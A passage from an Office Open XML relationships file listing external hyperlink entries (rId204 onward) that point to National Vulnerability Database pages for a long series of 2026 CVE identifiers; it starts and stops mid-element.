Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83954" TargetMode="External" Id="rId204" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83955" TargetMode="External" Id="rId205" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83967" TargetMode="External" Id="rId206" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83968" TargetMode="External" Id="rId207" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83969" TargetMode="External" Id="rId208" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83970" TargetMode="External" Id="rId209" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83971" TargetMode="External" Id="rId210" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83972" TargetMode="External" Id="rId211" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83973" TargetMode="External" Id="rId212" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83974" TargetMode="External" Id="rId213" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83975" TargetMode="External" Id="rId214" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83976" TargetMode="External" Id="rId215" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83977" TargetMode="External" Id="rId216" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83978" TargetMode="External" Id="rId217" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83979" TargetMode="External" Id="rId218" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83980" TargetMode="External" Id="rId219" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83981" TargetMode="External" Id="rId220" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83982" TargetMode="External" Id="rId221" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83983" TargetMode="External" Id="rId222" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83985" TargetMode="External" Id="rId223" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83986" TargetMode="External" Id="rId224" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83987" TargetMode="External" Id="rId225" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83988" TargetMode="External" Id="rId226" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83990" TargetMode="External" Id="rId227" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83995" TargetMode="External" Id="rId228" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84000" TargetMode="External" Id="rId229" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66767" TargetMode="External" Id="rId230" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69683" TargetMode="External" Id="rId231" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78623" TargetMode="External" Id="rId232" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82053" TargetMode="External" Id="rId233" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55215" TargetMode="External" Id="rId234" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67376" TargetMode="External" Id="rId235" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69342" TargetMode="External" Id="rId236" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69397" TargetMode="External" Id="rId237" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69514" TargetMode="External" Id="rId238" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69539" TargetMode="External" Id="rId239" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69599" TargetMode="External" Id="rId240" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69803" TargetMode="External" Id="rId241" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69804" TargetMode="External" Id="rId242" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69852" TargetMode="External" Id="rId243" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69881" TargetMode="External" Id="rId244" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69890" TargetMode="External" Id="rId245" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69929" TargetMode="External" Id="rId246" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69930" TargetMode="External" Id="rId247" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70065" TargetMode="External" Id="rId248" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70124" TargetMode="External" Id="rId249" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70587" TargetMode="External" Id="rId250" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71330" TargetMode="External" Id="rId251" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72928" TargetMode="External" Id="rId252" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73017" TargetMode="External" Id="rId253" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77494" TargetMode="External" Id="rId254" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77498" TargetMode="External" Id="rId255" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77499" TargetMode="External" Id="rId256" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77501" TargetMode="External" Id="rId257" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77502" TargetMode="External" Id="rId258" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77886" TargetMode="External" Id="rId259" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77888" TargetMode="External" Id="rId260" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77889" TargetMode="External" Id="rId261" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77890" TargetMode="External" Id="rId262" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77893" TargetMode="External" Id="rId263" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77895" TargetMode="External" Id="rId264" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78523" TargetMode="External" Id="rId265" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78574" TargetMode="External" Id="rId266" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83989" TargetMode="External" Id="rId267" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84001" TargetMode="External" Id="rId268" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78627" TargetMode="External" Id="rId269" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82061" TargetMode="External" Id="rId270" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82071" TargetMode="External" Id="rId271" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84387" TargetMode="External" Id="rId272" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20293" TargetMode="External" Id="rId273" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68846" TargetMode="External" Id="rId274" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68893" TargetMode="External" Id="rId275" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69340" TargetMode="External" Id="rId276" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69366" TargetMode="External" Id="rId277" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69536" TargetMode="External" Id="rId278" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82052" TargetMode="External" Id="rId279" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82054" TargetMode="External" Id="rId280" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82055" TargetMode="External" Id="rId281" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82057" TargetMode="External" Id="rId282" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82058" TargetMode="External" Id="rId283" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82065" TargetMode="External" Id="rId284" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82068" TargetMode="External" Id="rId285" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82070" TargetMode="External" Id="rId286" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82073" TargetMode="External" Id="rId287" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82074" TargetMode="External" Id="rId288" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82076" TargetMode="External" Id="rId289" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85689" TargetMode="External" Id="rId290" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62727" TargetMode="External" Id="rId291" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68840" TargetMode="External" Id="rId292" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68884" TargetMode="External" Id="rId293" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69287" TargetMode="External" Id="rId294" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69319" TargetMode="External" Id="rId295" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69379" TargetMode="External" Id="rId296" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69413" TargetMode="External" Id="rId297" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69422" TargetMode="External" Id="rId298" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69466" TargetMode="External" Id="rId299" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69473" TargetMode="External" Id="rId300" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69501" TargetMode="External" Id="rId301" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69567" TargetMode="External" Id="rId302" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69578" TargetMode="External" Id="rId303" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69814" TargetMode="External" Id="rId304" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69816" TargetMode="External" Id="rId305" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69817" TargetMode="External" Id="rId306" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69818" TargetMode="External" Id="rId307" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69834" TargetMode="External" Id="rId308" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69838" TargetMode="External" Id="rId309" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69859" TargetMode="External" Id="rId310" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69866" TargetMode="External" Id="rId311" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69889" TargetMode="External" Id="rId312" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69891" TargetMode="External" Id="rId313" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69896" TargetMode="External" Id="rId314" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69911" TargetMode="External" Id="rId315" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70283" TargetMode="External" Id="rId316" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70562" TargetMode="External" Id="rId317" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70565" TargetMode="External" Id="rId318" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70567" TargetMode="External" Id="rId319" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70568" TargetMode="External" Id="rId320" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70573" TargetMode="External" Id="rId321" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71332" TargetMode="External" Id="rId322" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71333" TargetMode="External" Id="rId323" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71340" TargetMode="External" Id="rId324" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71342" TargetMode="External" Id="rId325" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73022" TargetMode="External" Id="rId326" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77485" TargetMode="External" Id="rId327" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77894" TargetMode="External" Id="rId328" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77899" TargetMode="External" Id="rId329" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77905" TargetMode="External" Id="rId330" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78457" TargetMode="External" Id="rId331" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80093" TargetMode="External" Id="rId332" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82062" TargetMode="External" Id="rId333" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83940" TargetMode="External" Id="rId334" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83999" TargetMode="External" Id="rId335" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85360" TargetMode="External" Id="rId336" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68833" TargetMode="External" Id="rId337" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69415" TargetMode="External" Id="rId338" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69490" TargetMode="External" Id="rId339" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69566" TargetMode="External" Id="rId340" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71329" TargetMode="External" Id="rId341" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71348" TargetMode="External" Id="rId342" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76227" TargetMode="External" Id="rId343" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77892" TargetMode="External" Id="rId344" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78451" TargetMode="External" Id="rId345" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78579" TargetMode="External" Id="rId346" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71339" TargetMode="External" Id="rId347" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78625" TargetMode="External" Id="rId348" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78630" TargetMode="External" Id="rId349" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69469" TargetMode="External" Id="rId350" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78545" TargetMode="External" Id="rId351" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78550" TargetMode="External" Id="rId352" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44766" TargetMode="External" Id="rId353" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55545" TargetMode="External" Id="rId354" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55855" TargetMode="External" Id="rId355" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62801" TargetMode="External" Id="rId356" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66816" TargetMode="External" Id="rId357" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67369" TargetMode="External" Id="rId358" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67383" TargetMode="External" Id="rId359" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67386" TargetMode="External" Id="rId360" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67389" TargetMode="External" Id="rId361" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67390" TargetMode="External" Id="rId362" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67393" TargetMode="External" Id="rId363" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67633" TargetMode="External" Id="rId364" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67641" TargetMode="External" Id="rId365" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67645" TargetMode="External" Id="rId366" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67648" TargetMode="External" Id="rId367" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68776" TargetMode="External" Id="rId368" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68777" TargetMode="External" Id="rId369" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68778" TargetMode="External" Id="rId370" /><Relationship 